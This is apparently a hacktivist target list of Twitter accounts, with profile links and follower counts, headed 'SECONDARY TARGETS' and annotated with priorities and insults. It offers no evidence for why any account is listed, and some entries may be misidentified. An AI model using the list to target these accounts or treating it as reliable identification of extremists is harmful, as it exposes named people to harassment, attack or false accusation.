https://twitter.com/WatNewMed             https://twitter.com/intent/user?user_id=3009396094              2003 followers
https://twitter.com/Is_omar8             https://twitter.com/intent/user?user_id=2977832127              0 followers
https://twitter.com/Alouahabi5             https://twitter.com/intent/user?user_id=2188286257              362 followers
https://twitter.com/AIbntawheed             https://twitter.com/intent/user?user_id=3001683350              320 followers
https://twitter.com/dawlawee_itt             https://twitter.com/intent/user?user_id=3006242504              146 followers
https://twitter.com/peace_seeker1             https://twitter.com/intent/user?user_id=2994740061              51 followers
https://twitter.com/1ISIS_SNIPER             https://twitter.com/intent/user?user_id=2595376311              2224 followers
https://twitter.com/LiyaliJameel             https://twitter.com/intent/user?user_id=3001452858              127 followers
https://twitter.com/AL_Concorde             https://twitter.com/intent/user?user_id=2993214276              474 followers
https://twitter.com/2muslim1973             https://twitter.com/intent/user?user_id=2980294731              233 followers
https://twitter.com/Ga100A99             https://twitter.com/intent/user?user_id=2989611990              268 followers
https://twitter.com/mayhmony2             https://twitter.com/intent/user?user_id=3002810700              609 followers
https://twitter.com/NamlatDawla3             https://twitter.com/intent/user?user_id=2937070633              228 followers <.- important source of information
https://twitter.com/Citywolf_IS3             https://twitter.com/intent/user?user_id=3010070062              229 followers
https://twitter.com/dawlawee_itt             https://twitter.com/intent/user?user_id=3006242504              125 followers
https://twitter.com/Sheikh_Times2             https://twitter.com/intent/user?user_id=3007704497              524 followers
https://twitter.com/Sheikh_Times3             https://twitter.com/intent/user?user_id=3009660513              150 followers
https://twitter.com/DOWLATalISLAM             https://twitter.com/intent/user?user_id=3004341609              296 followers
https://twitter.com/KhilafaBaqiya2             https://twitter.com/intent/user?user_id=3008518852              263 followers
https://twitter.com/AIbntawheed             https://twitter.com/intent/user?user_id=3001683350              308 followers
https://twitter.com/AustraliAbu             https://twitter.com/intent/user?user_id=3006288116              179 followers
https://twitter.com/IvanMohamedIS             https://twitter.com/intent/user?user_id=3009822550              74 followers
https://twitter.com/rabdallhh             https://twitter.com/intent/user?user_id=1316902974              560 followers
https://twitter.com/naser04841             https://twitter.com/intent/user?user_id=2975025362              1142 followers
https://twitter.com/almuthana_5             https://twitter.com/intent/user?user_id=2927364404              4759 followers
https://twitter.com/moslimasonnia8             https://twitter.com/intent/user?user_id=3000119169              1772 followers
https://twitter.com/i40ayham8             https://twitter.com/intent/user?user_id=2747941463              2157 followers
https://twitter.com/mougarib2             https://twitter.com/intent/user?user_id=2762846529              2274 followers
https://twitter.com/aslamy1234             https://twitter.com/intent/user?user_id=2520202962              3214 followers
https://twitter.com/tara0_             https://twitter.com/intent/user?user_id=2751941711              1940 followers
https://twitter.com/StrugglerF             https://twitter.com/intent/user?user_id=3007434772              106 followers
https://twitter.com/anglo_klaxon             https://twitter.com/intent/user?user_id=403627624              795 followers
https://twitter.com/Abura3d_witness             https://twitter.com/intent/user?user_id=3005368762              319 followers
https://twitter.com/sheikh_fulaan             https://twitter.com/intent/user?user_id=3005472108              317 followers
https://twitter.com/131313catchme             https://twitter.com/intent/user?user_id=2818600236              641 followers
https://twitter.com/4363BOOM             https://twitter.com/intent/user?user_id=3003840718              1804 followers
https://twitter.com/Magnetgas1             https://twitter.com/intent/user?user_id=2994476308              487 followers
https://twitter.com/2o111492             https://twitter.com/intent/user?user_id=2997433370              2096 followers
https://twitter.com/sheikh_fulaan             https://twitter.com/intent/user?user_id=3005472108              317 followers
https://twitter.com/wayf44rer2             https://twitter.com/intent/user?user_id=3008646730              93 followers
https://twitter.com/3adiya             https://twitter.com/intent/user?user_id=353953158              351 followers
https://twitter.com/birdofgreen             https://twitter.com/intent/user?user_id=2827006337              297 followers
https://twitter.com/rainmedina5             https://twitter.com/intent/user?user_id=2994580534              181 followers
https://twitter.com/mjahd_ISIS             https://twitter.com/intent/user?user_id=2480066553              1034 followers
https://twitter.com/newsiraqis             https://twitter.com/intent/user?user_id=3008758701              219 followers
https://twitter.com/AIbntawheed             https://twitter.com/intent/user?user_id=3001683350              308 followers
https://twitter.com/BuSalum             https://twitter.com/intent/user?user_id=3001575529              147 followers
https://twitter.com/omarmoslem1             https://twitter.com/intent/user?user_id=2593325180              133 followers
https://twitter.com/samarrally             https://twitter.com/intent/user?user_id=2748537222              4481 followers
https://twitter.com/saagad32             https://twitter.com/intent/user?user_id=2416060134              4850 followers
https://twitter.com/ouyhgfdre             https://twitter.com/intent/user?user_id=2989566273              7791 followers
https://twitter.com/ANTI_HACKER3             https://twitter.com/intent/user?user_id=2953371964              1605 followers
https://twitter.com/7m00dC             https://twitter.com/intent/user?user_id=2819470152              5313 followers
https://twitter.com/nasr_d_s             https://twitter.com/intent/user?user_id=2524716062              555 followers
https://twitter.com/news__smart             https://twitter.com/intent/user?user_id=2536053984              14091 followers
https://twitter.com/Anti_laique_ttt             https://twitter.com/intent/user?user_id=2795776228              19367 followers
https://twitter.com/patronlimp1             https://twitter.com/intent/user?user_id=2467003938              10804 followers
https://twitter.com/bela_gemd3             https://twitter.com/intent/user?user_id=3015237507              6170 followers
https://twitter.com/AJNADEEN_2             https://twitter.com/intent/user?user_id=1342575516              5447 followers
https://twitter.com/jehad_118             https://twitter.com/intent/user?user_id=295151182              4164 followers
https://twitter.com/abo_talha20             https://twitter.com/intent/user?user_id=3003734468              4367 followers
https://twitter.com/Falujah123             https://twitter.com/intent/user?user_id=3009920632              5216 followers
https://twitter.com/OmarWardat             https://twitter.com/intent/user?user_id=233138889              4035 followers

**************************************
** SECONDARY TARGETS **
**************************************

https://twitter.com/mhiisni                https://twitter.com/intent/user?user_id=393440365        342 K   TARGET N° 1 !!!
https://twitter.com/EYADQUNAIBI                https://twitter.com/intent/user?user_id=532700952        156 K followers
https://twitter.com/s_2O17_                https://twitter.com/intent/user?user_id=241640145        116 K followers
https://twitter.com/zahran1970                https://twitter.com/intent/user?user_id=870434053        111 K followers
https://twitter.com/ZaidZamanHamid       https://twitter.com/intent/user?user_id=126966274        104 K followers
https://twitter.com/Al_forqaan                https://twitter.com/intent/user?user_id=399730349        88.1 K FOLLOWERS
https://twitter.com/IslamArmy01                https://twitter.com/intent/user?user_id=707052698        73700 followers
https://twitter.com/dralgzouli                https://twitter.com/intent/user?user_id=571854743        >>> 50,9 K Followers !!! <<<
https://twitter.com/alheetari                https://twitter.com/intent/user?user_id=1100821141        47.900 followers (prédicateur)
https://twitter.com/anjemchoudary        https://twitter.com/intent/user?user_id=263428605        26.000 followers << !!
https://twitter.com/Latest111                https://twitter.com/intent/user?user_id=2813747288        24.4 K followers !
https://twitter.com/motlaqghazai        https://twitter.com/intent/user?user_id=425726100        (22500 followers)
https://twitter.com/Abu_Baraa1                https://twitter.com/intent/user?user_id=513116847        20,000 follower
https://twitter.com/thabet207                https://twitter.com/intent/user?user_id=619362308        15 K followers also has another account  
https://twitter.com/thabet209                 https://twitter.com/intent/user?user_id=1510978010     (only 1943 followers)
https://twitter.com/fallujaty2                https://twitter.com/intent/user?user_id=2834912653        12.8 K followers !
https://twitter.com/ah_bawade                https://twitter.com/intent/user?user_id=2836021826        12.8 K FOLLOWERS
https://twitter.com/HarvardDr                https://twitter.com/intent/user?user_id=18596784        12000 followers
https://twitter.com/5AboSuhib              https://twitter.com/intent/user?user_id=2818431679        11,4 K followers
https://twitter.com/TurkieALrubaish        https://twitter.com/intent/user?user_id=217219193        10000 followers
https://twitter.com/Altmimy_1             https://twitter.com/intent/user?user_id=842163252              8814 followers
https://twitter.com/Labik0             https://twitter.com/intent/user?user_id=1070814528              6862 followers
https://twitter.com/MuN_291             https://twitter.com/intent/user?user_id=2969122137              11981 followers
https://twitter.com/aboood11397             https://twitter.com/intent/user?user_id=749690491              4731 followers
https://twitter.com/T11vvw             https://twitter.com/intent/user?user_id=458433072              7716 followers
https://twitter.com/DemrosKing             https://twitter.com/intent/user?user_id=52319998              3546 followers
https://twitter.com/Haliisheikh             https://twitter.com/intent/user?user_id=2154441645              4027 followers
https://twitter.com/Syricide             https://twitter.com/intent/user?user_id=1640024238              3461 followers
https://twitter.com/omarz90             https://twitter.com/intent/user?user_id=2793856333              3936 followers
https://twitter.com/Frere_de_prison             https://twitter.com/intent/user?user_id=2801957531              3762 followers
https://twitter.com/PierreVogel             https://twitter.com/intent/user?user_id=241443349              3174 followers
https://twitter.com/MuQatux             https://twitter.com/intent/user?user_id=2813566464              3379 followers
https://twitter.com/Mouhd_kirkuk             https://twitter.com/intent/user?user_id=2614699480              4810 followers
https://twitter.com/privvovet             https://twitter.com/intent/user?user_id=2907133972              3167 followers
https://twitter.com/ALansarea_IS             https://twitter.com/intent/user?user_id=2842637681              3150 followers
https://twitter.com/kavkaz_news             https://twitter.com/intent/user?user_id=321225490              2396 followers
https://twitter.com/mmfeezo             https://twitter.com/intent/user?user_id=2954448189              4192 followers
https://twitter.com/br_aa2015M             https://twitter.com/intent/user?user_id=2812670492              4302 followers
https://twitter.com/musthom             https://twitter.com/intent/user?user_id=233210325              2165 followers
https://twitter.com/hatrek_3             https://twitter.com/intent/user?user_id=2934506273              5278 followers
https://twitter.com/DavidSarfarah             https://twitter.com/intent/user?user_id=2171277993              628 followers
https://twitter.com/med8ar             https://twitter.com/intent/user?user_id=1677721717              2430 followers
https://twitter.com/AbuAlbaraaSham             https://twitter.com/intent/user?user_id=1713482744              2368 followers
https://twitter.com/Almahira__             https://twitter.com/intent/user?user_id=2845300386              2102 followers
https://twitter.com/empirelarnaka             https://twitter.com/intent/user?user_id=2895036143              4229 followers
https://twitter.com/es5sss             https://twitter.com/intent/user?user_id=907079240              1874 followers
https://twitter.com/sarmadalo             https://twitter.com/intent/user?user_id=2793404284              2190 followers
https://twitter.com/Shkh_AL_Adnani             https://twitter.com/intent/user?user_id=2608170230              2088 followers
https://twitter.com/Abu_Yahya_1             https://twitter.com/intent/user?user_id=2771859675              1818 followers
https://twitter.com/SaifAdDawlah             https://twitter.com/intent/user?user_id=2905972385              2365 followers
https://twitter.com/ummusmaan1             https://twitter.com/intent/user?user_id=1673774420              1497 followers
https://twitter.com/TheVictoryFront             https://twitter.com/intent/user?user_id=2543225743              1648 followers
https://twitter.com/khelafa4             https://twitter.com/intent/user?user_id=2723710390              1140 followers
https://twitter.com/Eretz_Zen             https://twitter.com/intent/user?user_id=930223009              1200 followers
https://twitter.com/Mo7_AbuAzzam10             https://twitter.com/intent/user?user_id=2700781477              1494 followers
https://twitter.com/Otaib_i             https://twitter.com/intent/user?user_id=2869618285              1664 followers
https://twitter.com/1S_10i             https://twitter.com/intent/user?user_id=2859295734              1541 followers
https://twitter.com/ATDawah             https://twitter.com/intent/user?user_id=2935089910              1439 followers
https://twitter.com/okt_saleh             https://twitter.com/intent/user?user_id=2567900250              985 followers
https://twitter.com/bogda7h3x             https://twitter.com/intent/user?user_id=2898880975              1858 followers
https://twitter.com/Huar__7667             https://twitter.com/intent/user?user_id=2745897980              1960 followers
https://twitter.com/SparHacker3             https://twitter.com/intent/user?user_id=2848905732              1047 followers
https://twitter.com/almashi_123             https://twitter.com/intent/user?user_id=2158160874              1127 followers
https://twitter.com/aboumosaab15             https://twitter.com/intent/user?user_id=2951458869              1478 followers
https://twitter.com/ibraheem_pharma             https://twitter.com/intent/user?user_id=623769638              9 followers
https://twitter.com/darul_ilm             https://twitter.com/intent/user?user_id=1001171148              906 followers
https://twitter.com/Muslim_Activist             https://twitter.com/intent/user?user_id=1355110922              846 followers
https://twitter.com/AalawOfficial             https://twitter.com/intent/user?user_id=1707995719              1280 followers
https://twitter.com/WakeUp_MV             https://twitter.com/intent/user?user_id=1690616444              881 followers
https://twitter.com/jhiker0             https://twitter.com/intent/user?user_id=1159622828              1544 followers
https://twitter.com/rizafa850             https://twitter.com/intent/user?user_id=2575810213              801 followers
https://twitter.com/_srab_             https://twitter.com/intent/user?user_id=1057584271              789 followers
https://twitter.com/sh17isis             https://twitter.com/intent/user?user_id=2882955775              715 followers
https://twitter.com/AbuDahda             https://twitter.com/intent/user?user_id=2839444066              901 followers
https://twitter.com/ISwounds             https://twitter.com/intent/user?user_id=2233017462              752 followers
https://twitter.com/Lion_Sumaal123             https://twitter.com/intent/user?user_id=2847603102              911 followers
https://twitter.com/alneemy08             https://twitter.com/intent/user?user_id=2794076279              823 followers
https://twitter.com/med_aidi             https://twitter.com/intent/user?user_id=2813231981              735 followers
https://twitter.com/AladinoBaraBang             https://twitter.com/intent/user?user_id=968523577              1014 followers
https://twitter.com/01waleed             https://twitter.com/intent/user?user_id=569280421              887 followers
https://twitter.com/filaqomar             https://twitter.com/intent/user?user_id=735140622              727 followers
https://twitter.com/mind964             https://twitter.com/intent/user?user_id=2564188833              2560 followers
https://twitter.com/BO_OMAR_1             https://twitter.com/intent/user?user_id=2471430913              695 followers
https://twitter.com/khatabamazigh             https://twitter.com/intent/user?user_id=549845798              699 followers
https://twitter.com/abounour2006             https://twitter.com/intent/user?user_id=243773193              756 followers
https://twitter.com/mmmm14092gmail1             https://twitter.com/intent/user?user_id=2949280424              1224 followers
https://twitter.com/dr_khilafah             https://twitter.com/intent/user?user_id=2893623695              858 followers
https://twitter.com/Raqi__22             https://twitter.com/intent/user?user_id=390984601              697 followers
https://twitter.com/FethiMehmet             https://twitter.com/intent/user?user_id=776088217              703 followers
https://twitter.com/IbnNabih1             https://twitter.com/intent/user?user_id=2969900219              1164 followers
https://twitter.com/khilafa_nabawia             https://twitter.com/intent/user?user_id=2806420953              826 followers
https://twitter.com/M__al2zdi             https://twitter.com/intent/user?user_id=1612662571              641 followers
https://twitter.com/hajer56_             https://twitter.com/intent/user?user_id=2448143235              916 followers
https://twitter.com/chawki_souda             https://twitter.com/intent/user?user_id=2956051689              721 followers
https://twitter.com/aboo__s3d__             https://twitter.com/intent/user?user_id=2177094340              637 followers
https://twitter.com/cacrania             https://twitter.com/intent/user?user_id=2906051851              687 followers
https://twitter.com/MaalaouiZoh             https://twitter.com/intent/user?user_id=2837518829              663 followers
https://twitter.com/kenyanwitness             https://twitter.com/intent/user?user_id=2671147860              782 followers
https://twitter.com/oum_mohamed_82             https://twitter.com/intent/user?user_id=2803266560              612 followers
https://twitter.com/ckrid24             https://twitter.com/intent/user?user_id=706320623              613 followers
https://twitter.com/BEN_SCHISObogos             https://twitter.com/intent/user?user_id=2432414546              238 followers
https://twitter.com/sabeqoon             https://twitter.com/intent/user?user_id=225542055              588 followers
https://twitter.com/dawla94             https://twitter.com/intent/user?user_id=2932113061              1302 followers
https://twitter.com/Irhabiyyah7             https://twitter.com/intent/user?user_id=2872403926              547 followers
https://twitter.com/amrsoufi1             https://twitter.com/intent/user?user_id=1139822400              558 followers
https://twitter.com/amenal7201             https://twitter.com/intent/user?user_id=2839648148              627 followers
https://twitter.com/AbuYahyaKurdy             https://twitter.com/intent/user?user_id=2872229815              440 followers
https://twitter.com/srordojana             https://twitter.com/intent/user?user_id=280909158              530 followers
https://twitter.com/Abuhaniefabe             https://twitter.com/intent/user?user_id=1226300581              531 followers
https://twitter.com/IslamTekbir             https://twitter.com/intent/user?user_id=2843290793              627 followers
https://twitter.com/AlosoodA             https://twitter.com/intent/user?user_id=2847235110              500 followers
https://twitter.com/omaty8             https://twitter.com/intent/user?user_id=2865608989              1770 followers
https://twitter.com/irahabiana             https://twitter.com/intent/user?user_id=2816020676              523 followers
https://twitter.com/saraa_1435             https://twitter.com/intent/user?user_id=2295244335              541 followers
https://twitter.com/boudjam3a             https://twitter.com/intent/user?user_id=2607379358              498 followers
https://twitter.com/FouadJazzz             https://twitter.com/intent/user?user_id=1638103651              534 followers
https://twitter.com/shuaibali99             https://twitter.com/intent/user?user_id=2605412107              479 followers
https://twitter.com/hidara89             https://twitter.com/intent/user?user_id=2166869395              565 followers
https://twitter.com/IndianWitness             https://twitter.com/intent/user?user_id=2649687060              548 followers
https://twitter.com/HdoddAA             https://twitter.com/intent/user?user_id=2861312831              745 followers
https://twitter.com/Amatullah_isis             https://twitter.com/intent/user?user_id=2824706393              1025 followers
https://twitter.com/More1988as             https://twitter.com/intent/user?user_id=2171280359              458 followers
https://twitter.com/said_e_kurdi             https://twitter.com/intent/user?user_id=219570149              559 followers
https://twitter.com/malook123456789             https://twitter.com/intent/user?user_id=2737107750              411 followers
https://twitter.com/alkadiy761             https://twitter.com/intent/user?user_id=2906359790              729 followers
https://twitter.com/ISIS911m             https://twitter.com/intent/user?user_id=2967687761              631 followers
https://twitter.com/UsainAnnan             https://twitter.com/intent/user?user_id=742218368              468 followers
https://twitter.com/IS_Khurrassan             https://twitter.com/intent/user?user_id=2799497511              486 followers
https://twitter.com/alfath5544             https://twitter.com/intent/user?user_id=2816798618              434 followers
https://twitter.com/Mysa93_             https://twitter.com/intent/user?user_id=627643015              448 followers
https://twitter.com/isis_isis_1992             https://twitter.com/intent/user?user_id=2853855386              386 followers
https://twitter.com/alhatafi             https://twitter.com/intent/user?user_id=546237820              436 followers
https://twitter.com/oneworld_2013             https://twitter.com/intent/user?user_id=704097027              460 followers
https://twitter.com/Daareb                https://twitter.com/intent/user?user_id=2689675182        435 followers
https://twitter.com/Abdullah93IS        https://twitter.com/intent/user?user_id=2807935894        424 followers
https://twitter.com/abomeshab                https://twitter.com/intent/user?user_id=1689483223        432 followers
https://twitter.com/abukhawlamjr        https://twitter.com/intent/user?user_id=2423926546        431 followers
https://twitter.com/oum_oumshaheed        https://twitter.com/intent/user?user_id=2660307251        429 followers
https://twitter.com/alwazer12322301        https://twitter.com/intent/user?user_id=2728284269        438 followers
https://twitter.com/abutalha003                https://twitter.com/intent/user?user_id=2939486800        1229 followers
https://twitter.com/hadi__rbg                https://twitter.com/intent/user?user_id=2834867785        389 followers
https://twitter.com/Rbgisis                https://twitter.com/intent/user?user_id=2793452147        392 followers
https://twitter.com/aboshy6                https://twitter.com/intent/user?user_id=2810830976        921 followers
https://twitter.com/saraya1992                https://twitter.com/intent/user?user_id=574924571        423 followers
https://twitter.com/IsisAymen                https://twitter.com/intent/user?user_id=2910653692        377 followers
https://twitter.com/mheisne                https://twitter.com/intent/user?user_id=2936085964        377 followers
https://twitter.com/Umm_Anaas               https://twitter.com/intent/user?user_id=2904872199        399 followers
https://twitter.com/KS_Harun                https://twitter.com/intent/user?user_id=2847927565        379 followers
https://twitter.com/Abirat_sabeal3        https://twitter.com/intent/user?user_id=2805028731        381 followers
https://twitter.com/SAHNGHUITI99        https://twitter.com/intent/user?user_id=1355154583        366 followers
https://twitter.com/gaagii4_Is                https://twitter.com/intent/user?user_id=2899773572        368 followers
https://twitter.com/Abu_Ismael_128        https://twitter.com/intent/user?user_id=1940867528        360 followers
https://twitter.com/abou_salsabil1        https://twitter.com/intent/user?user_id=2891337387        339 followers                     Tweets are protected
https://twitter.com/khademgorbaa        https://twitter.com/intent/user?user_id=2182820570        351 followers
https://twitter.com/hakimoutlaw                https://twitter.com/intent/user?user_id=2589660896        351 followers
https://twitter.com/UmmMuhajir                https://twitter.com/intent/user?user_id=2736204082        380 followers
https://twitter.com/R3D__1                https://twitter.com/intent/user?user_id=2568572378        354 followers
https://twitter.com/iambackkuffar        https://twitter.com/intent/user?user_id=2902323999        351 followers
https://twitter.com/StDeWh            https://twitter.com/intent/user?user_id=2269517484                350 followers
https://twitter.com/Niwelt1          https://twitter.com/intent/user?user_id=2860235410           348 followers
https://twitter.com/gruponaya                https://twitter.com/intent/user?user_id=59617855        342 followers
https://twitter.com/sheelalsham                https://twitter.com/intent/user?user_id=2754052266        330 followers
https://twitter.com/Ahmad131480Ali        https://twitter.com/intent/user?user_id=2949523988        400 followers
https://twitter.com/ibrahim5                https://twitter.com/intent/user?user_id=19118119        333 followers
https://twitter.com/byareek2                https://twitter.com/intent/user?user_id=2895775425        372 followers
https://twitter.com/albhraoe                https://twitter.com/intent/user?user_id=2794057163        335 followers
https://twitter.com/ansar_alduolh5        https://twitter.com/intent/user?user_id=2880623916        323 followers
https://twitter.com/yosftw               https://twitter.com/intent/user?user_id=389364214          321 followers
https://twitter.com/Ff76Mmbbcc                https://twitter.com/intent/user?user_id=2607623832        320 followers
https://twitter.com/vlado_2                https://twitter.com/intent/user?user_id=2758648039        310 followers
https://twitter.com/ISancag                https://twitter.com/intent/user?user_id=2843500366        322 followers
https://twitter.com/moj934                https://twitter.com/intent/user?user_id=2790943126        1830 followers
https://twitter.com/focusONakhira        https://twitter.com/intent/user?user_id=2739938648        300 followers
https://twitter.com/imranbora                https://twitter.com/intent/user?user_id=861472916        297 followers
https://twitter.com/moslem__tounsi        https://twitter.com/intent/user?user_id=2156452021        287 followers
https://twitter.com/Sans0Nom                https://twitter.com/intent/user?user_id=870766363        294 followers
https://twitter.com/qutibamaqdesi        https://twitter.com/intent/user?user_id=2188113879        288 followers
https://twitter.com/masmap_isis                https://twitter.com/intent/user?user_id=2933891319        347 followers
https://twitter.com/mohammed0shahin        https://twitter.com/intent/user?user_id=577423116        291 followers
https://twitter.com/abuUmar665                https://twitter.com/intent/user?user_id=2769515050        297 followers
https://twitter.com/AbuIsa18                https://twitter.com/intent/user?user_id=2559503724        277 followers
https://twitter.com/jihadislam221        https://twitter.com/intent/user?user_id=2949094799        277 followers
https://twitter.com/sawarimFin                https://twitter.com/intent/user?user_id=2882477727        270 followers        (bad        motherfucker)
https://twitter.com/3Jzrawi                https://twitter.com/intent/user?user_id=2956322311        366 followers
https://twitter.com/OOip555                https://twitter.com/intent/user?user_id=2922948367        286 followers
https://twitter.com/ZakkiNsOm                https://twitter.com/intent/user?user_id=1520230333        272 followers
https://twitter.com/ma3251                https://twitter.com/intent/user?user_id=2671629829        250 followers
https://twitter.com/abukhalid1924        https://twitter.com/intent/user?user_id=2755304987        318 followers
https://twitter.com/kattab1993                https://twitter.com/intent/user?user_id=2956962249        264 followers
https://twitter.com/stormofkhalifah        https://twitter.com/intent/user?user_id=2887744656        269 followers
https://twitter.com/sobhan74                https://twitter.com/intent/user?user_id=2828643335        251 followers
https://twitter.com/HitchyRozay                https://twitter.com/intent/user?user_id=369000857        253 followers
https://twitter.com/damalansaar                https://twitter.com/intent/user?user_id=2657918244        253 followers
https://twitter.com/0002jehad                https://twitter.com/intent/user?user_id=2587377560        242 followers
https://twitter.com/kassimahm                https://twitter.com/intent/user?user_id=2277534342        248 followers
https://twitter.com/isis_121                https://twitter.com/intent/user?user_id=2868360192        240 followers)
https://twitter.com/amaaas                https://twitter.com/intent/user?user_id=2801820744        234 followers
https://twitter.com/pistism1                https://twitter.com/intent/user?user_id=2802666515        244 followers
https://twitter.com/utaibiam/                https://twitter.com/intent/user?user_id=1009438796        230 followers
https://twitter.com/MoaazHyd                https://twitter.com/intent/user?user_id=2693420096        234 followers
https://twitter.com/DFallowme                https://twitter.com/intent/user?user_id=1686188192        223 followers
https://twitter.com/RamzeYe1                https://twitter.com/intent/user?user_id=2254494485        231 followers
https://twitter.com/abdulrah82                https://twitter.com/intent/user?user_id=2502386892        225 followers
https://twitter.com/fx_tot                https://twitter.com/intent/user?user_id=2362583712        227 folowers
https://twitter.com/media_sham                https://twitter.com/intent/user?user_id=287229304        221 followers
https://twitter.com/TakfirTaghut        https://twitter.com/intent/user?user_id=2764831804        264 followers
https://twitter.com/GirlaIlin                https://twitter.com/intent/user?user_id=2655102180        222 followers
https://twitter.com/uthmanalmuhajir        https://twitter.com/intent/user?user_id=2872590658        221 Followers
https://twitter.com/ahmedsamena                https://twitter.com/intent/user?user_id=2822436691        221 followers
https://twitter.com/m5t91                https://twitter.com/intent/user?user_id=2938242480        315 followers
https://twitter.com/majidd2011                https://twitter.com/intent/user?user_id=1435111093        205 followers
https://twitter.com/Ansar_ashrieah        https://twitter.com/intent/user?user_id=2363838311        216 followers
https://twitter.com/chose_isis                https://twitter.com/intent/user?user_id=2914381341        266 followers
https://twitter.com/njoty11                https://twitter.com/intent/user?user_id=1725527862        196 followers
https://twitter.com/Pagdadee                https://twitter.com/intent/user?user_id=2865746563        198 followers
https://twitter.com/DabiqState                https://twitter.com/intent/user?user_id=2886115701        196 followers
https://twitter.com/Political_Dr        https://twitter.com/intent/user?user_id=1724391900        212 followers
https://twitter.com/ChemsJkd                https://twitter.com/intent/user?user_id=2850636569        204 followers
https://twitter.com/memokemo76                https://twitter.com/intent/user?user_id=2948888248        194 followers
https://twitter.com/AhsanMuhammadi        https://twitter.com/intent/user?user_id=334241138        194 followers
https://twitter.com/flesh_laz                https://twitter.com/intent/user?user_id=2735710235        192 followers
https://twitter.com/Laithalazdi                https://twitter.com/intent/user?user_id=1065822896        189 followers
https://twitter.com/Tahaamin3                https://twitter.com/intent/user?user_id=586544190        220 followers
https://twitter.com/jihadi0john                https://twitter.com/intent/user?user_id=2965990305        222 followers
https://twitter.com/g4k2d                https://twitter.com/intent/user?user_id=2419086171        187 followers
https://twitter.com/isis_2007_                https://twitter.com/intent/user?user_id=2788415848        185 followers
https://twitter.com/omeralbaghdady3        https://twitter.com/intent/user?user_id=2813601206        184 followers
https://twitter.com/MissAkhirah                https://twitter.com/intent/user?user_id=2793359524        783 followers
https://twitter.com/QWE90901080               https://twitter.com/intent/user?user_id=2794459667        180 followers
https://twitter.com/almuthanna187        https://twitter.com/intent/user?user_id=2933474999        190 folowers
https://twitter.com/abdullahs2002        https://twitter.com/intent/user?user_id=1688664702        183 followers
https://twitter.com/mo7eb_al_dawlah        https://twitter.com/intent/user?user_id=2260847374        173 followers
https://twitter.com/GreenBird6666        https://twitter.com/intent/user?user_id=2725390435        175 followers
https://twitter.com/AboSef511                https://twitter.com/intent/user?user_id=2472746852        168 followers
https://twitter.com/alhuraith                https://twitter.com/intent/user?user_id=2617226939        159 followers
https://twitter.com/frnas112                https://twitter.com/intent/user?user_id=2802342807        165 followers
https://twitter.com/3diyah_4                https://twitter.com/intent/user?user_id=2969204015        224 followers
https://twitter.com/SAMujahida_1        https://twitter.com/intent/user?user_id=2960118537        168 folowers
https://twitter.com/riadh_hamouda        https://twitter.com/intent/user?user_id=2298527876        162 followers
https://twitter.com/vfhhhppo                https://twitter.com/intent/user?user_id=2829463766        155 followers
https://twitter.com/mecca_islever22        https://twitter.com/intent/user?user_id=707764798        160 followerss
https://twitter.com/KhalidMuhajir2        https://twitter.com/intent/user?user_id=2950399005        270 followers
https://twitter.com/I_S_7                https://twitter.com/intent/user?user_id=2803237149        153 followers
https://twitter.com/AbuAmeenah2014        https://twitter.com/intent/user?user_id=2828136034        152 followers
https://twitter.com/abdulrabii                https://twitter.com/intent/user?user_id=1967161928        148 followers
https://twitter.com/truth_seeker6        https://twitter.com/intent/user?user_id=1038332203        147 followers               disgusting motherfucker!
https://twitter.com/jondi36647923        https://twitter.com/intent/user?user_id=2569824949        143 followers
https://twitter.com/shiekhspeare        https://twitter.com/intent/user?user_id=2737280267        159 followers
https://twitter.com/omarsport595        https://twitter.com/intent/user?user_id=2930971051        157 followers
https://twitter.com/abbad_j                https://twitter.com/intent/user?user_id=2798881467        146 followers
https://twitter.com/bkc_moslim                https://twitter.com/intent/user?user_id=2970481211        158 followers
https://twitter.com/cecen_mucahidi        https://twitter.com/intent/user?user_id=2916006719        155 followers
https://twitter.com/OumShaheed         https://twitter.com/intent/user?user_id=2330712831        154 followers
https://twitter.com/bab_ul_islam                https://twitter.com/intent/user?user_id=459056350         145 followers
https://twitter.com/mmmohamed8                https://twitter.com/intent/user?user_id=2924794298        256 followers
https://twitter.com/_TheChaudhry        https://twitter.com/intent/user?user_id=905818620        143 followers
https://twitter.com/Al_Nasia                https://twitter.com/intent/user?user_id=315737624        149 followers
https://twitter.com/abou_3aicha                https://twitter.com/intent/user?user_id=2887149255        141 followers
https://twitter.com/Imaan_Vs_Kufr        https://twitter.com/intent/user?user_id=2579347231        129 followers
https://twitter.com/iaklafh             https://twitter.com/intent/user?user_id=2874700849             128 followers
https://twitter.com/AnsarElKhelafa        https://twitter.com/intent/user?user_id=1947375848        126 followers
https://twitter.com/shahid_assomali        https://twitter.com/intent/user?user_id=2663172165        127 followers
https://twitter.com/attaurrehman222        https://twitter.com/intent/user?user_id=965805445        18 followers     twits protecded
https://twitter.com/mhagm_12                https://twitter.com/intent/user?user_id=2810697247        126 followers
https://twitter.com/AbuHaiderKarrar        https://twitter.com/intent/user?user_id=1014846307        125 followers
https://twitter.com/Bint_Mujahid        https://twitter.com/intent/user?user_id=2724132077        125 followers
https://twitter.com/sunnaredline2        https://twitter.com/intent/user?user_id=2950185295        125 followers
https://twitter.com/almuhed1                https://twitter.com/intent/user?user_id=2422332103        119 followers
https://twitter.com/idrees_11481        https://twitter.com/intent/user?user_id=1625493434        163 followers
https://twitter.com/dnyayy1                https://twitter.com/intent/user?user_id=1861343016        114 followers
https://twitter.com/abomojahedmosle        https://twitter.com/intent/user?user_id=547151362        113 followers
https://twitter.com/HalalHaribo                https://twitter.com/intent/user?user_id=2903829298        120 followers
https://twitter.com/77islamicstate9        https://twitter.com/intent/user?user_id=2971597696        175 followers
https://twitter.com/Islaam__8      https://twitter.com/intent/user?user_id=2925069442        107 followers
https://twitter.com/msfadlillah                https://twitter.com/intent/user?user_id=440689078        106 followers
https://twitter.com/Is1Retwit                https://twitter.com/intent/user?user_id=2971324689        138 followers
https://twitter.com/wilayaKurdistan          https://twitter.com/intent/user?user_id=2916589670      100 followers
https://twitter.com/sos_sos888           https://twitter.com/intent/user?user_id=2958520852        100 followers
https://twitter.com/magd676794                https://twitter.com/intent/user?user_id=2885860299        99 followers
https://twitter.com/hosen117                https://twitter.com/intent/user?user_id=2862599668        97 followers
https://twitter.com/aboualkhattab2        https://twitter.com/intent/user?user_id=2800441791        98 followers
https://twitter.com/Abuhaitham12        https://twitter.com/intent/user?user_id=2970769377        124 followers
https://twitter.com/tap_intoreality        https://twitter.com/intent/user?user_id=2358982305        93 followers
https://twitter.com/Adh_aher                https://twitter.com/intent/user?user_id=2892733366        106 followers
